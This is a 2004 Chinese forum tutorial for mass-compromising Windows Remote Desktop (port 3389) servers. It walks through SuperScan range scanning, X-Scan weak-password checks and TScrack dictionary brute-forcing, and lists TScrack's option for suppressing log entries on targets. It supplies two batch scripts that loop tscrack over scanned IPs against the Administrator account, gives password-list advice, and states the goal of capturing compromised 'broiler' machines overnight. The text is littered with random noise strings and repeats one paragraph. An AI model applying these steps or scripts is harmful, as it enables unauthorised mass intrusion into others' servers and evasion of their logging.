数学建模社区-数学中国

标题: 终端服务真正的另类入侵 [打印本页]
作者: 韩冰    时间: 2004-10-6 09:51
标题: 终端服务真正的另类入侵

作者:霜风 QQ:14226581

+ ~8 `; i- `6 U4 ~

终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。4 _6 t5 ~8 n0 J( R 这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: 4 U' {1 t+ h- i- c首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:* e9 B* ~' g z3 z9 F) T% ^ 先打开superscan3如图16 D( V+ n7 n( `- \- C% K , J& u- j) x: L: k9 X- p! V2 ? 此主题相关图片如下: ( s) ?* n8 P+ J8 H5 R' g

. D% l: B+ N1 @( \' w1 ?+ v" u

; I8 n% V! R( b. v$ ~ 接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2. P6 q7 j2 J! V ' W& e( w1 M* B" P* ]4 j' I 此主题相关图片如下: 7 o' h# |, m0 G% A- I( k) ?* h" ?, O9 q

8 h8 `0 e; a* N _

然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除. 8 W3 `1 x/ A4 U) `这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图35 e( G5 d% A6 K% z- ~4 L1 _$ q1 U L3 ]9 d/ z3 c; ]此主题相关图片如下: - s" m" M2 a! L% G& a

' q7 F5 P3 F; z- b" e

5 o/ G' }8 H8 @$ x “|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。 & }9 a% t u7 \ $ \% n" _" F& L此主题相关图片如下: 6 j# b* Q- [' F+ O$ A& V y+ i! u$ s

5 T+ ~; C7 ` Q# ^3 O+ K

接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5 ! q5 z9 r/ L. x* @! E7 |! X/ v: Q4 ]/ D 此主题相关图片如下:- H; v. F/ ]; P/ M" b6 s+ {

/ o% u; D2 q/ @ y' C$ z

进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。 / t: S+ Z9 h3 a# T# E O所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。# A' a7 i: z8 s/ W( a TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。 ( j1 z3 o( z: J& _5 b$ \- ^4 X" c此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。 ! b; K/ P l& j/ w/ [在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:& z% w' n% B& W2 |0 V -h : Print usage help and exit E# r8 | ^6 R. G# J7 E2 K-V : Print version info and exit9 c' \ p2 R* B H8 v -s : Print chipher strenght info and exit& m, O+ x L3 x; c -b : Enable failed password beep1 _3 Y# J* o6 `! _5 k4 q* b+ x -t : Use two simultaneous connections [EXPERIMENTAL]& ]5 |7 i! z* l2 ~" Y -N : Prevent System Log entries on targeted server" g6 V! b, x) n- ] -U : Uninstall tscrack and remove components 8 C3 ]1 X6 f! I0 t& N I/ `* Z7 z-f <number> : Wordlist entry to start cracking with; A7 d3 @) W2 {, b% V. X w -F <delay> : Sampling Frequency (Delay between samples in ms)( a/ u& f# ~3 H( T. D+ b, d0 u -l <user> : Account name to use, defaults to Administrator # N' Z( A) S: E+ ?, a- H-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted* g8 P) R5 n+ j+ U -p <password> : Use <password> to logon instead of wordlist/blank pass/ c9 x. ] c& J1 h" t1 [ -D <domain> : Specify domain to attempt logon to

8 L3 |! ~; R- R5 l6 E6 t7 F& G* s 7 D- q/ I# |: V2 L, u3 d8 E6 q 我就帮忙翻译一下吧,翻译得不好可不要怪我啊:5 `1 P+ G5 R1 v) m( x -h : 显示使用帮助然后退出 / M/ n# T! U, ?# P( o8 ^-V : 显示版本信息然后退出7 @+ C9 `0 g1 E# w -s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)) u3 k5 v: O p -b : 密码错误时发出声音9 ?, G+ Y1 E1 {; ]9 e3 w -t : 同时发出多个连接,就是多线程。, c4 [8 u; c+ U! f2 ] -N : Prevent System Log entries on targeted server ' j# ~( Q! p1 @2 W-U : 卸载移除tscrack组件。 " K! g* {( k* b& i5 U; g-f <number> : 使用-F后面的密码。6 H' |" q: h/ p; T$ k6 k [ -F <delay> : 间隔时间(频率)3 F" B/ {6 A( N% L# [ -l <user> : 使用-L后面的用户名7 L8 ? I- N& c4 v9 v) E" W) l7 z- P -w <wordlist> : 使用-W后面的字典# j' B& X7 q4 V6 S! R -p <password> : 使用-W后的密码 ) X4 s$ c. K$ w- E6 d6 K [, X8 w-D <domain> : 登陆主页面?

" X% u( D' {4 V n2 F. P/ x* k 相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本: - r* ?( ^) C. d. I4 B' p@if not exist IpcScan.txt goto noscan ( \0 V" R9 W7 K2 y@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i. l+ ?" ~9 F9 ?! k$ G5 J :noscan 5 f J7 `8 ?7 c3 M; s; V0 T! T7 P@echo 3389.txt no find or scan faild

; W0 R8 a5 P1 _" S# C 这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)

, T9 y; B) X5 Z* ^, S 保存后把后错名改为BAT就可以了。! ~& X. A) h' D" b9 i4 P7 U 还写一个BAT,名字为HACK.BAT,代码如下:

3 M6 J& P+ _4 j# i@if not exist tscrack.exe goto noscan 2 D. e. P# s2 `7 Y( x6 m@tscrack %1 -l administartor -w pass.dic >>rouji.txt( i. J# l8 s' z9 i. W. B :noscan 2 ]' J# H! F/ f, g; J@echo tscrack.exe no find or scan faild

" c$ C& z( A6 s" r4 L' K1 G/ y 这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC # @ \& t0 c9 U; Y- O, A制作方法如上。 0 ?$ Q& b3 e h& w0 {- g然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6 & B; V3 X' ~3 Y. W; p c, b ; U7 s! w8 _# z此主题相关图片如下: ; R; a& l! @/ z6 `, d

怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. " z, x/ V, E6 n% t* w最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7 9 `* a9 Z3 _" s$ | 4 h" |7 i6 T$ H _. D- C u2 q此主题相关图片如下:7 ^1 {& ]8 f1 C; k( [; } 3 P# X9 g. x. K' r 怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. i! y! v- }- q2 ]0 h 最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~



欢迎光临 数学建模社区-数学中国 (http://www.madio.net/) Powered by Discuz! X2.5